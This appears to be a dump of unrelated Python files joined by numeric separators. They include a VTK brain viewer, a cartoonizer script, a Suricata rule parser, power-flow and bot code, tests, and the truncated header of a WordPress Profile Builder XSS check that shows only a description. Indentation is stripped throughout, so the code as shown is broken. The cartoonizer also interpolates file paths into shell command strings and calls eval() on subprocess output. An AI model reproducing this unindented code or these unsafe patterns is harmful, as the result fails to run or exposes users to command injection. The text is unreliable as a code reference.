mask_settings_layout.addWidget(mask_multi_color_radio, 2, 0)
mask_settings_layout.addWidget(mask_single_color_radio, 2, 1)
mask_settings_layout.addWidget(self.create_new_separator(), 3, 0, 1, 2)
self.mask_label_cbs = []
c_col, c_row = 0, 4 # c_row must always be (+1) of last row
for i in range(1, 11):
self.mask_label_cbs.append(QtWidgets.QCheckBox("Label {}".format(i)))
mask_settings_layout.addWidget(self.mask_label_cbs[i - 1], c_row, c_col)
c_row = c_row + 1 if c_col == 1 else c_row
c_col = 0 if c_col == 1 else 1
mask_settings_group_box.setLayout(mask_settings_layout)
self.grid.addWidget(mask_settings_group_box, 1, 0, 2, 2)
for i, cb in enumerate(self.mask_label_cbs):
if i < len(self.mask.labels) and self.mask.labels[i].actor:
cb.setChecked(True)
cb.clicked.connect(self.mask_label_checked)
else:
cb.setDisabled(True)
def add_views_widget(self):
axial_view = QtWidgets.QPushButton("Axial")
coronal_view = QtWidgets.QPushButton("Coronal")
sagittal_view = QtWidgets.QPushButton("Sagittal")
views_box = QtWidgets.QGroupBox("Views")
views_box_layout = QtWidgets.QVBoxLayout()
views_box_layout.addWidget(axial_view)
views_box_layout.addWidget(coronal_view)
views_box_layout.addWidget(sagittal_view)
views_box.setLayout(views_box_layout)
self.grid.addWidget(views_box, 3, 0, 2, 2)
axial_view.clicked.connect(self.set_axial_view)
coronal_view.clicked.connect(self.set_coronal_view)
sagittal_view.clicked.connect(self.set_sagittal_view)
@staticmethod
def create_new_picker(max_value, min_value, step, picker_value, value_changed_func):
if isinstance(max_value, int):
picker = QtWidgets.QSpinBox()
else:
picker = QtWidgets.QDoubleSpinBox()
picker.setMaximum(max_value)
picker.setMinimum(min_value)
picker.setSingleStep(step)
picker.setValue(picker_value)
picker.valueChanged.connect(value_changed_func)
return picker
def add_brain_projection(self):
projection_cb = QtWidgets.QCheckBox("Projection")
projection_cb.clicked.connect(self.brain_projection_vc)
return projection_cb
def mask_label_checked(self):
for i, cb in enumerate(self.mask_label_cbs):
if cb.isChecked():
self.mask.labels[i].property.SetOpacity(self.mask_opacity_sp.value())
elif cb.isEnabled(): # labels without data are disabled
self.mask.labels[i].property.SetOpacity(0)
self.render_window.Render()
def mask_single_color_radio_checked(self):
for label in self.mask.labels:
if label.property:
label.property.SetColor(MASK_COLORS[0])
self.render_window.Render()
def mask_multi_color_radio_checked(self):
for label in self.mask.labels:
if label.property:
label.property.SetColor(label.color)
self.render_window.Render()
def brain_projection_vc(self):
projection_checked = self.brain_projection_cb.isChecked()
self.brain_slicer_cb.setDisabled(projection_checked) # disable slicer checkbox, cant use both at same time
self.brain_image_prop.SetOpacity(projection_checked)
self.render_window.Render()
def brain_slicer_vc(self):
slicer_checked = self.brain_slicer_cb.isChecked()
for widget in self.slicer_widgets:
widget.setEnabled(slicer_checked)
self.brain_projection_cb.setDisabled(slicer_checked) # disable projection checkbox, cant use both at same time
for prop in self.brain_slicer_props:
prop.GetProperty().SetOpacity(slicer_checked)
self.render_window.Render()
def brain_opacity_vc(self):
opacity = round(self.brain_opacity_sp.value(), 2)
self.brain.labels[0].property.SetOpacity(opacity)
self.render_window.Render()
def brain_threshold_vc(self):
self.process_changes()
threshold = self.brain_threshold_sp.value()
self.brain.labels[0].extractor.SetValue(0, threshold)
self.render_window.Render()
def brain_smoothness_vc(self):
self.process_changes()
smoothness = self.brain_smoothness_sp.value()
self.brain.labels[0].smoother.SetNumberOfIterations(smoothness)
self.render_window.Render()
def mask_opacity_vc(self):
opacity = round(self.mask_opacity_sp.value(), 2)
for i, label in enumerate(self.mask.labels):
if label.property and self.mask_label_cbs[i].isChecked():
label.property.SetOpacity(opacity)
self.render_window.Render()
def mask_smoothness_vc(self):
self.process_changes()
smoothness = self.mask_smoothness_sp.value()
for label in self.mask.labels:
if label.smoother:
label.smoother.SetNumberOfIterations(smoothness)
self.render_window.Render()
def set_axial_view(self):
self.renderer.ResetCamera()
fp = self.renderer.GetActiveCamera().GetFocalPoint()
p = self.renderer.GetActiveCamera().GetPosition()
dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)
self.renderer.GetActiveCamera().SetPosition(fp[0], fp[1], fp[2] + dist)
self.renderer.GetActiveCamera().SetViewUp(0.0, 1.0, 0.0)
self.renderer.GetActiveCamera().Zoom(1.8)
self.render_window.Render()
def set_coronal_view(self):
self.renderer.ResetCamera()
fp = self.renderer.GetActiveCamera().GetFocalPoint()
p = self.renderer.GetActiveCamera().GetPosition()
dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)
self.renderer.GetActiveCamera().SetPosition(fp[0], fp[2] - dist, fp[1])
self.renderer.GetActiveCamera().SetViewUp(0.0, 0.5, 0.5)
self.renderer.GetActiveCamera().Zoom(1.8)
self.render_window.Render()
def set_sagittal_view(self):
self.renderer.ResetCamera()
fp = self.renderer.GetActiveCamera().GetFocalPoint()
p = self.renderer.GetActiveCamera().GetPosition()
dist = math.sqrt((p[0] - fp[0]) ** 2 + (p[1] - fp[1]) ** 2 + (p[2] - fp[2]) ** 2)
self.renderer.GetActiveCamera().SetPosition(fp[2] + dist, fp[0], fp[1])
self.renderer.GetActiveCamera().SetViewUp(0.0, 0.0, 1.0)
self.renderer.GetActiveCamera().Zoom(1.6)
self.render_window.Render()
@staticmethod
def create_new_separator():
horizontal_line = QtWidgets.QWidget()
horizontal_line.setFixedHeight(1)
horizontal_line.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
horizontal_line.setStyleSheet("background-color: #c8c8c8;")
return horizontal_line
def process_changes(self):
for _ in range(10):
self.app.processEvents()
time.sleep(0.1)
|
456819
|
from PIL import Image
import argparse
import os
import mimetypes
from utils.transforms import get_no_aug_transform
import torch
from models.generator import Generator
import numpy as np
import torchvision.transforms.functional as TF
import torch.nn.functional as F
from torchvision import transforms
import cv2
from torchvision import utils as vutils
import subprocess
import tempfile
import re
from tqdm import tqdm
import time
def inv_normalize(img):
# Adding 0.1 to all normalization values since the model is trained (erroneously) without correct de-normalization
mean = torch.Tensor([0.485, 0.456, 0.406]).to(device)
std = torch.Tensor([0.229, 0.224, 0.225]).to(device)
img = img * std.view(1, 3, 1, 1) + mean.view(1, 3, 1, 1)
img = img.clamp(0, 1)
return img
def predict_images(image_list):
trf = get_no_aug_transform()
image_list = torch.from_numpy(np.array([trf(img).numpy() for img in image_list])).to(device)
with torch.no_grad():
generated_images = netG(image_list)
generated_images = inv_normalize(generated_images)
pil_images = []
for i in range(generated_images.size()[0]):
generated_image = generated_images[i].cpu()
pil_images.append(TF.to_pil_image(generated_image))
return pil_images
def listdir_fullpath(d):
return [os.path.join(d, f) for f in os.listdir(d)]
def divide_chunks(l, n):
# looping till length l
for i in range(0, len(l), n):
yield l[i:i + n]
def predict_file(input_path, output_path):
# File is image
if mimetypes.guess_type(input_path)[0].startswith("image"):
image = Image.open(input_path).convert('RGB')
predicted_image = predict_images([image])[0]
predicted_image.save(output_path)
# File is video
elif mimetypes.guess_type(input_path)[0].startswith("video"):
# Create temp folder for storing frames as images
temp_dir = tempfile.TemporaryDirectory()
# Extract frames from video
subprocess.run(f"ffmpeg -i \"{input_path}\" -loglevel error -stats \"{os.path.join(temp_dir.name, 'frame_%07d.png')}\"")
# Process images with model
frame_paths = listdir_fullpath(temp_dir.name)
batches = [*divide_chunks(frame_paths, batch_size)]
for path_chunk in tqdm(batches):
imgs = [Image.open(p) for p in path_chunk]
imgs = predict_images(imgs)
for path, img in zip(path_chunk, imgs):
img.save(path)
# Get video frame rate
frame_rate = subprocess.check_output(f"ffprobe -v error -select_streams v -of default=noprint_wrappers=1:nokey=1 -show_entries stream=r_frame_rate \"{input_path}\"")
frame_rate = eval(frame_rate.split()[0]) # Dirty eval
# Combine frames with original audio
subprocess.run(f"ffmpeg -y -r {frame_rate} -i \"{os.path.join(temp_dir.name, 'frame_%07d.png')}\" -i \"{input_path}\" -map 0:v -map 1:a? -loglevel error -stats \"{output_path}\"")
else:
raise IOError("Invalid file extension.")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="This file is used to convert images/videos to cartoons.")
parser.add_argument("-i", "--input", type=str, required=True, help="Path to file (image/video) or path to folder containing multiple images.")
parser.add_argument("-o", "--output", type=str, required=True, help="Where predicted images/videos should be saved. If --input is a single file, --output should be a single file as well.")
parser.add_argument("-d", "--device", type=str, default="cuda")
parser.add_argument("-b", "--batch_size", type=int, default=4)
input_path, output_path, user_stated_device, batch_size = vars(parser.parse_args()).values()
device = torch.device(user_stated_device)
pretrained_dir = "./checkpoints/trained_netG.pth"
netG = Generator().to(device)
netG.eval()
# Load weights
if user_stated_device == "cuda":
netG.load_state_dict(torch.load(pretrained_dir))
else:
netG.load_state_dict(torch.load(pretrained_dir, map_location=torch.device('cpu')))
# Single file
if os.path.isfile(input_path):
predict_file(input_path, output_path)
# Multiple files
else:
os.makedirs(output_path, exist_ok=True)
for file_name in tqdm(os.listdir(input_path), desc="Processing files"):
file_path = os.path.join(input_path, file_name)
output_file_path = os.path.join(output_path, file_name)
predict_file(file_path, output_file_path)
|
456846
|
import math
from mks.models import Member
from persons.models import Person, PersonAlias
# from: http://www.cs.princeton.edu/introcs/21function/ErrorFunction.java.html
# Implements the Gauss error function.
# erf(z) = 2 / sqrt(pi) * integral(exp(-t*t), t = 0..z)
#
# fractional error in math formula less than 1.2 * 10 ^ -7.
# although subject to catastrophic cancellation when z in very close to 0
# from Chebyshev fitting formula for erf(z) from Numerical Recipes, 6.2
def erf(z):
t = 1.0 / (1.0 + 0.5 * abs(z))
# use Horner's method
ans = 1 - t * math.exp( -z*z - 1.26551223 +
t * ( 1.00002368 +
t * ( 0.37409196 +
t * ( 0.09678418 +
t * (-0.18628806 +
t * ( 0.27886807 +
t * (-1.13520398 +
t * ( 1.48851587 +
t * (-0.82215223 +
t * ( 0.17087277))))))))))
if z >= 0.0:
return ans
else:
return -ans
def percentile(avg,var,val):
if not var:
return 50
z = (val-avg)/math.sqrt(var)
p = erf(z)/2.0*100.0+50.0
p = int(round(p))
p = min(100,p)
p = max(0,p)
return p
def get_all_mk_names():
# TODO: refactor all places to point directly to knesset_data_django
from knesset_data_django.mks.utils import get_all_mk_names
return get_all_mk_names()
|
456887
|
import elasticsearch
import argparse
import re
def parse_rule_line(rule_line):
"""
Parse each rule line and return a dict representation of a rule
:param rule_line:
:return: rule dict
"""
rule_dict = {}
rule_info = re.search("\((.*)\)", rule_line).group(1)
msg_sections = rule_info.split(';')
# Get the rule action
rule_dict['action'] = rule_line.split()[0]
# Get the rule headers
rule_dict['headers'] = rule_line.split("(")[0].replace(rule_dict["action"], "").strip()
# Get the rest of the rule options
for section in msg_sections:
if len(section) > 0:
# print(repr(section))
split_section = section.split(':')
section_key = split_section[0].strip()
if len(split_section) > 1:
section_value = split_section[1].strip()
if "," in section_value:
rule_dict[section_key] = [i.strip() for i in section_value.split(',')]
else:
rule_dict[section_key] = section_value
else:
rule_dict[section_key] = ""
return rule_dict
def parse_rules(filename="/etc/suricata/rules/downloaded.rules"):
"""
:param filename: the rule file to parse
Parse the rule file to use in reporting
:return: rule_dict: return a dict of rule_id:rule
"""
rules_dict = {}
rule_file = open(filename, 'r')
for line in rule_file:
if not line.startswith("#") and line != "\n":
rule = parse_rule_line(line.strip())
rules_dict[rule['sid']] = rule
return rules_dict
if __name__ == '__main__':
pass
|
456918
|
import cympy
import pandas
class Substation(object):
""""""
def __init__(self, model_filename):
""""""
# Open the model
self.model_filename = model_filename
cympy.study.Open(self.model_filename)
def baseload_allocation(self, feeder_loads):
"""Allocate load with respect to the total demand recorded"""
# Create Load Allocation object
la = cympy.sim.LoadAllocation()
for feeder in list(feeder_loads.keys()):
# Create the Demand object
demand = cympy.sim.Meter()
demand.LoadValueType = cympy.enums.LoadValueType.KW_PF
# Fill in the demand values
demand.IsTotalDemand = False
demand.DemandA = cympy.sim.LoadValue()
demand.DemandA.Value1 = feeder_loads[feeder]['MW'] * 1000 / 3.0
demand.DemandA.Value2 = 98
demand.DemandB = cympy.sim.LoadValue()
demand.DemandB.Value1 = feeder_loads[feeder]['MW'] * 1000 / 3.0
demand.DemandB.Value2 = 98
demand.DemandC = cympy.sim.LoadValue()
demand.DemandC.Value1 = feeder_loads[feeder]['MW'] * 1000 / 3.0
demand.DemandC.Value2 = 98
# Set the first feeders demand
la.SetDemand(feeder, demand)
# Run the load allocation
la.Run(list(feeder_loads.keys()))
def add_power_devices(self, node_ids, network_ids, device_ids):
""""""
# Add section with spot loads
for node, network, device in zip(node_ids, network_ids, device_ids):
new_section = cympy.study.AddSection('MYSECTION' + device, # Section ID
network, # Network ID
device, # Load ID
cympy.enums.DeviceType.SpotLoad,
node, # Node ID
'NEW_NODE_from' + node)
def set_power_devices(self, device_ids, values):
""""""
# Get active load model
activeLoadModel = cympy.study.GetActiveLoadModel()
for device_id, value in zip(device_ids, values):
# Get device
device = cympy.study.GetDevice(device_id, cympy.enums.DeviceType.SpotLoad)
# Get the number of phases for the device
section = cympy.study.GetSection(device.SectionID)
nb_phases = int(len(section.GetValue("Phase")))
# Add load value divided by the number of phases
for phase in range(0, nb_phases):
cympy.study.SetValueDevice(float(value) / nb_phases, # Load value
'CustomerLoads[0].CustomerLoadModels.Get(' +
str(activeLoadModel.ID) + ').' + # Active load model (August)
'CustomerLoadValues[' + str(phase) + # Phase
'].LoadValue.KW', # Parameter to set
device_id, # Load ID
cympy.enums.DeviceType.SpotLoad) # Load type
def run_powerflow(self, feeders):
""""""
# Run the power flow
lf = cympy.sim.LoadFlow()
lf.Run(list(feeders))
def list_nodes(self):
"""List all the nodes
Return:
a DataFrame with section_id, node_id, latitude and longitude
"""
# Get all nodes
nodes = cympy.study.ListNodes()
# Create a frame
nodes = pandas.DataFrame(nodes, columns=['node_object'])
nodes['node_id'] = nodes['node_object'].apply(lambda x: x.ID)
nodes['section_id'] = [0] * len(nodes)
nodes['network_id'] = [0] * len(nodes)
nodes['latitude'] = [0] * len(nodes)
nodes['longitude'] = [0] * len(nodes)
nodes['distance'] = [0] * len(nodes)
for node in nodes.itertuples():
nodes.loc[node.Index, 'section_id'] = cympy.study.QueryInfoNode("SectionId", node.node_id)
nodes.loc[node.Index, 'latitude'] = cympy.study.QueryInfoNode("CoordY", node.node_id)
nodes.loc[node.Index, 'longitude'] = cympy.study.QueryInfoNode("CoordX", node.node_id)
nodes.loc[node.Index, 'distance'] = cympy.study.QueryInfoNode("Distance", node.node_id)
nodes.loc[node.Index, 'network_id'] = cympy.study.QueryInfoNode("NetworkId", node.node_id)
# Cast the right type
for column in ['latitude']:
nodes[column] = nodes[column].apply(lambda x: None if x is '' else float(x) / (1.26 * 100000))
# Cast the right type
for column in ['longitude']:
nodes[column] = nodes[column].apply(lambda x: None if x is '' else float(x) / (100000))
# Cast the right type
for column in ['distance']:
nodes[column] = nodes[column].apply(lambda x: None if x is '' else float(x))
return nodes
def get_voltage(self, frame):
"""
Args:
devices (DataFrame): list of all the devices or nodes to include
Return:
devices_voltage (DataFrame): devices and their corresponding voltage for
each phase
"""
# Create a new frame to hold the results
voltage = frame.copy()
# Reset or create new columns to hold the result
voltage['voltage_A'] = [0] * len(voltage)
voltage['voltage_B'] = [0] * len(voltage)
voltage['voltage_C'] = [0] * len(voltage)
for value in frame.itertuples():
# Get the according voltage per phase in a pandas dataframe
voltage.loc[value.Index, 'voltage_A'] = cympy.study.QueryInfoNode("VpuA", value.node_id)
voltage.loc[value.Index, 'voltage_B'] = cympy.study.QueryInfoNode("VpuB", value.node_id)
voltage.loc[value.Index, 'voltage_C'] = cympy.study.QueryInfoNode("VpuC", value.node_id)
# Cast the right type
for column in ['voltage_A', 'voltage_B', 'voltage_C']:
voltage[column] = voltage[column].apply(lambda x: None if x is '' else float(x))
return voltage
def get_voltage_from_node_ids(self, node_ids):
"""
Args:
node_ids (List): node ids
Return:
node_voltage (List)
"""
voltages = []
for node_id in node_ids:
voltages.append(cympy.study.QueryInfoNode("Vpu", node_id))
return voltages
def get_info_node(self, node, info):
""""""
return cympy.study.QueryInfoNode(info, node)
|
456925
|
from abc import ABC, abstractmethod
from pathlib import Path
from typing import List
from novelsave.core.entities.novel import Novel
class BasePackager(ABC):
@property
@abstractmethod
def priority(self):
"""Determines the order in which the packager must be called. Lowest first"""
@abstractmethod
def keywords(self) -> List[str]:
"""keywords that identify this packager. for example, output format"""
@abstractmethod
def package(self, novel: Novel) -> Path:
"""package the a select novel from the database into another format."""
@abstractmethod
def destination(self, novel: Novel) -> Path:
"""provide file or directory where the novel has been packaged to, file is preferred."""
|
456935
|
import os
import utils
import config
import traceback
import argparse
import logging.config
from luna import LunaExcepion
logging.config.fileConfig("logging.conf")
logger = logging.getLogger()
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--image', required=True, help='input an image to predict')
return parser.parse_args()
if __name__ == '__main__':
try:
logger.info("------ start ------")
utils.lock()
args = parse_args()
if not os.path.exists(args.image):
raise LunaExcepion(config.inputerr)
from keras.applications.vgg16 import VGG16, preprocess_input, decode_predictions
from keras.preprocessing import image
import numpy as np
# 学習済みのVGG16をロード
# 構造とともに学習済みの重みも読み込まれる
model = VGG16(weights='imagenet')
# 画像を読み込んで4次元テンソルへ変換
img = image.load_img(args.image, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
# クラスを予測
# 入力は1枚の画像なので[0]のみ
preds = model.predict(preprocess_input(x))
# 予測確率が高いトップ5を出力
results = decode_predictions(preds, top=5)[0]
data = []
for result in results:
data.append({"name": result[1], "percentage": '%.10f' % (result[2] * 100)});
print({"error": "", "data": data})
except (KeyboardInterrupt, SystemExit):
utils.unlock()
utils.error(config.syserr)
except LunaExcepion as e:
utils.error(e.value)
if (e.value == config.locked):
exit()
logger.info("------ end ------")
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
utils.error(config.syserr)
utils.unlock()
logger.info("------ end ------")
|
456947
|
import logging
from telegram import Update
from telegram.ext import CommandHandler, Updater, CallbackContext
logger = logging.getLogger(__name__)
def add_core(upd: Updater, core_handlers_group: int):
logger.info("register smile-mode handlers")
dp = upd.dispatcher
dp.add_handler(CommandHandler("start", start, run_async=True), core_handlers_group)
dp.add_handler(CommandHandler("help", help_, run_async=True), core_handlers_group)
def start(update: Update, _: CallbackContext):
update.message.reply_text(
"I'm a VLDC Bot. 😼\n\n" "My source: https://github.com/vldc-hq/vldc-bot"
)
def help_(update: Update, _: CallbackContext):
"""List of ALL commands"""
update.message.reply_text(
"The bot should be an admin with all admins permissions\n\n"
"Skills for admins:\n\n"
"SmileMode: allows only not text messages (stickers, GIFs)\n"
"`/smile_mode_on` – smile mode ON\n"
"`/smile_mode_off` – smile mode OFF\n"
"\n"
"Version: just version\n"
"`/version` – show current version of the bot\n"
"\n\n"
"Skills for all:\n\n"
"SinceMode: when the last time we ware discuss this topic?\n"
"`/since TOPIC` – update topic counter\n"
"`/since_list` – list off all hot topics\n"
"for example:\n"
" >>> alice: нет, ну современный пхп вполне нормальный язык\n"
" >>> bob: /since современный пыхыпы\n"
" >>> Nayn: 0 days without «современный пыхыпы»! Already was discussed 47 times\n"
" >>> alice: -__-\n"
"\n\n"
"Passive:\n"
"TowelMode: required reply from new users otherwise blacklisted them\n"
"TowelMode is ON by default\n\n"
"Feel free to add more stuff!\n"
"\nhttps://github.com/vldc-hq/vldc-bot/issues\n"
"\n\n"
)
def error(update: Update, context: CallbackContext):
"""Log Errors caused by Updates"""
logger.warning('Update "%s" caused error "%s"', update, context.error)
|
456974
|
import warnings
from types import FrameType
from typing import Optional, Dict, Any, cast
__all__ = ["make_step"]
import inspect
from baikal.steps import Step
def make_step(
base_class: type, attr_dict: Dict[str, Any] = None, class_name: Optional[str] = None
) -> type:
"""Creates a step subclass from the given base class.
For example, calling::
PCA = make_step(sklearn.decomposition.PCA, class_name="PCA")
is equivalent to::
class PCA(Step, sklearn.decomposition.PCA):
def __init__(self, *args, name=None, n_outputs=1, **kwargs):
super().__init__(*args, name=name, n_outputs=n_outputs, **kwargs)
Parameters
----------
base_class
The base class to inherit from. It must implement the scikit-learn API.
attr_dict
Dictionary of additional attributes for the class. You can use this to add
methods such as ``fit_compute`` to the class. (keys: name of attribute (``str``),
values: attributes).
class_name
Name of the step class. If None, the name will be the name of the given
base class. For instances made from the generated class to be pickle-able,
you must pass a name that matches the name of the variable the generated
class is being assigned to (the variable must also be declared at the top
level of the module). **Deprecation notice**: This argument will be required
from version 0.5.0.
Returns
-------
step_subclass
A new class that inherits from both Step and the given base class and has the
the specified attributes.
"""
def __init__(self, *args, name=None, n_outputs=1, **kwargs):
super(self.__class__, self).__init__(
*args, name=name, n_outputs=n_outputs, **kwargs,
)
metaclass = type(base_class)
if class_name is None:
warnings.warn(
"Pass a string to `class_name`. From version 0.5.0 this argument will be"
" required.",
FutureWarning,
)
name = base_class.__name__
else:
name = class_name
bases = (Step, base_class)
caller_frame = cast(FrameType, cast(FrameType, inspect.currentframe()).f_back)
caller_module = caller_frame.f_globals["__name__"]
dict = {"__init__": __init__, "__module__": caller_module}
if attr_dict is not None:
dict.update(attr_dict)
step_subclass = metaclass(name, bases, dict)
return step_subclass
|
457016
|
import webview
import pytest
from .util import run_test
def test_bg_color():
window = webview.create_window('Background color test', 'https://www.example.org', background_color='#0000FF')
run_test(webview, window)
def test_invalid_bg_color():
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#dsg0000FF')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='FF00FF')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#ac')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#EFEFEH')
with pytest.raises(ValueError):
webview.create_window('Background color test', 'https://www.example.org', background_color='#0000000')
|
457042
|
import hoki.age_utils as au
import hoki.load as load
import pkg_resources
import numpy as np
import pandas as pd
import pytest
from hoki.utils.exceptions import HokiFatalError, HokiUserWarning, HokiFormatError
# Loading Data
data_path = pkg_resources.resource_filename('hoki', 'data')
hr_file = data_path + '/hrs-sin-imf_chab100.zem4.dat'
cmd_file = data_path + '/cmd_bv_z002_bin_imf135_300'
myhrd = load.model_output(hr_file, hr_type='TL')
mycmd = load.unpickle(cmd_file)
# Creating Test Inputs
fake_hrd_input = pd.DataFrame.from_dict({'name': ['star1', 'star2', 'star3'],
'logT': np.array([4.58, 4.48, 4.14]),
'logL': np.array([4.83, 5.07, 5.40])})
bad_hrd_input = pd.DataFrame.from_dict({'logT': np.array(['bla']),
'logL': np.array([4.83])})
no_name_input = pd.DataFrame.from_dict({'logT': np.array([4.58, 4.48, 4.14]),
'logL': np.array([4.83, 5.07, 5.40])})
bad_hrd_input2 = pd.DataFrame.from_dict({'logT': np.array([4.58, 'bla']),
'logL': np.array([4.83, 2.0])})
fake_cmd_input = pd.DataFrame.from_dict({'name': ['star1', 'star2', 'STAR3'],
'col': np.array([-0.3, 0.5, -0.25]),
'mag': np.array([-5, -10, -1])})
bad_cmd_input = pd.DataFrame.from_dict({'col': np.array(['bla']),
'mag': np.array([-5])})
# Testing Suite
class TestAgeWizard(object):
def test_init_basic(self):
assert au.AgeWizard(obs_df=fake_hrd_input, model=hr_file), "Loading HRD file path failed"
assert au.AgeWizard(obs_df=fake_hrd_input, model=myhrd), "Loading with hoki.hrdiagrams.HRDiagram failed"
assert au.AgeWizard(obs_df=fake_cmd_input, model=mycmd), 'Loading with hoki.cmd.CMD'
assert au.AgeWizard(obs_df=fake_cmd_input, model=cmd_file), 'Loading CMD from frile failed'
def test_bad_init(self):
with pytest.raises(HokiFatalError):
__, __ = au.AgeWizard(obs_df=fake_cmd_input, model='sdfghj'), 'HokiFatalError should be raised'
with pytest.raises(HokiFormatError):
__, __ = au.AgeWizard(obs_df='edrftgyhu', model=cmd_file), 'HokiFormatError should be raised'
def test_combine_pdfs_not_you(self):
wiz = au.AgeWizard(fake_hrd_input, myhrd)
wiz.calculate_sample_pdf(not_you=['star1'])
cpdf = wiz.sample_pdf.pdf
assert np.sum(np.isclose([cpdf[0], cpdf[9]], [0.0, 0.7231526323765232])) == 2, "combined pdf is not right"
def test_most_likely_age(self):
wiz = au.AgeWizard(obs_df=fake_hrd_input, model=hr_file)
assert np.isclose(wiz.most_likely_age[0], 6.9), "Most likely age wrong"
def test_most_likely_ages(self):
wiz = au.AgeWizard(obs_df=fake_hrd_input, model=hr_file)
a = wiz.most_likely_ages
assert np.sum(np.isclose([a[0], a[1], a[2]], [6.9, 6.9, 6.9])) == 3, "Most likely ages not right"
def test_combine_pdfs(self):
wiz = au.AgeWizard(fake_hrd_input, myhrd)
wiz.calculate_sample_pdf()
assert np.isclose(wiz.sample_pdf.pdf[9],0.551756734145878), "Something is wrong with the combined_Age PDF"
def test_calculate_p_given_age_range(self):
wiz = au.AgeWizard(fake_hrd_input, myhrd)
probas = wiz.calculate_p_given_age_range([6.7, 6.9])
assert np.sum(np.isclose([probas[0], probas[1], probas[2]],
[0.515233714952414, 0.7920611550946726, 0.6542441096583737])) == 3, \
"probability given age range is messed up"
class TestFindCoordinates(object):
def test_hrd_input(self):
T_coord, L_coord = au.find_coordinates(obs_df=fake_hrd_input, model=myhrd)
assert np.sum(
np.isclose([T_coord[0], T_coord[1], T_coord[2]], [45, 44, 40])) == 3, "Temperature coordinates wrong"
assert np.sum(
np.isclose([L_coord[0], L_coord[1], L_coord[2]], [77, 80, 83])) == 3, "Luminosity coordinates wrong"
def test_cmd_input(self):
col_coord, mag_range = au.find_coordinates(obs_df=fake_cmd_input, model=mycmd)
assert np.sum(
np.isclose([col_coord[0], col_coord[1], col_coord[2]], [27, 35, 27])) == 3, "color coordinates wrong"
assert np.sum(
np.isclose([mag_range[0], mag_range[1], mag_range[2]], [90, 40, 130])) == 3, "magnitude coordinates wrong"
class TestFindCMDCoordinates(object):
def test_fake_input(self):
col_coord, mag_range = au._find_cmd_coordinates(obs_df=fake_cmd_input, mycmd=mycmd)
assert np.sum(
np.isclose([col_coord[0], col_coord[1], col_coord[2]], [27, 35, 27])) == 3, "color coordinates wrong"
assert np.sum(
np.isclose([mag_range[0], mag_range[1], mag_range[2]], [90, 40, 130])) == 3, "magnitude coordinates wrong"
def test_bad_input(self):
with pytest.raises(HokiFormatError):
col_coord, mag_range = au._find_cmd_coordinates(obs_df=bad_hrd_input, mycmd=mycmd)
def test_bad_input_2(self):
col_coord, mag_range = au._find_cmd_coordinates(obs_df=bad_cmd_input, mycmd=mycmd)
#assert np.siz(col_coord[0]), "This should be a nan"
assert np.isclose(mag_range[0], 90), "This L coordinate is wrong - test_bad_input."
class TestFindHRDCoordinates(object):
def test_fake_input(self):
T_coord, L_coord = au._find_hrd_coordinates(obs_df=fake_hrd_input, myhrd=myhrd)
assert np.sum(
np.isclose([T_coord[0], T_coord[1], T_coord[2]], [45, 44, 40])) == 3, "Temperature coordinates wrong"
assert np.sum(
np.isclose([L_coord[0], L_coord[1], L_coord[2]], [77, 80, 83])) == 3, "Luminosity coordinates wrong"
def test_bad_input(self):
with pytest.raises(HokiFormatError):
__, __ = au._find_hrd_coordinates(obs_df=bad_cmd_input, mycmd=mycmd)
def test_bad_input(self):
T_coord, L_coord = au._find_hrd_coordinates(obs_df=bad_hrd_input, myhrd=myhrd)
#assert np.isnan(T_coord[0]), "This should be a nan"
assert np.isclose(L_coord[0], 77), "This L coordinate is wrong - test_bad_input."
class TestNormalise1D(object):
def test_it_runs(self):
au.normalise_1d(np.array([0, 1, 4, 5, 0, 1, 7, 8]), crop_the_future=False)
def test_basic(self):
norm = au.normalise_1d(np.array([0, 0, 1, 0, 0, 0, 0]), crop_the_future=False)
assert norm[2] == 1, 'Normalisation done wrong'
assert sum(norm) == 1, "Normalisaton done wrong"
class TestCalculatePDFs(object):
def test_fake_input(self):
pdf_df = au.calculate_individual_pdfs(fake_hrd_input, myhrd)
assert 'star1' in pdf_df.columns, "Column name issue"
assert int(sum(pdf_df.star1)) == 1, "PDF not calculated correctly"
def test_input_without_name(self):
pdf_df = au.calculate_individual_pdfs(no_name_input, myhrd)
assert 's1' in pdf_df.columns, "Column names not created right"
def test_bad_input(self):
pdf_df = au.calculate_individual_pdfs(bad_hrd_input2, myhrd)
assert not np.isnan(sum(pdf_df.s0)), "somwthing went wrong"
#assert np.isnan(sum(distributions_df.s1)), "somwthing went wrong"
class TestCalculateSamplePDF(object):
def test_basic(self):
distributions = au.calculate_distributions(fake_hrd_input, myhrd)
combined = au.calculate_sample_pdf(distributions)
assert np.isclose(combined.pdf[9], 0.2715379752638662), "combined PDF not right"
def test_drop_bad(self):
distributions = au.calculate_distributions(fake_hrd_input, myhrd)
combined = au.calculate_sample_pdf(distributions, not_you=[3])
assert np.isclose(combined.pdf[9], 0.2715379752638662), "combined PDF not right"
def test_drop_good(self):
distributions = au.calculate_distributions(fake_hrd_input, myhrd)
combined = au.calculate_sample_pdf(distributions, not_you=['star1'])
assert np.isclose(combined.pdf[9], 0.774602971512809), "combined PDF not right"
|
457092
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Wordpress Profile Builder Plugin Cross-Site Scripting''',
"description": '''The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.''',
"severity": "medium",
"references": [
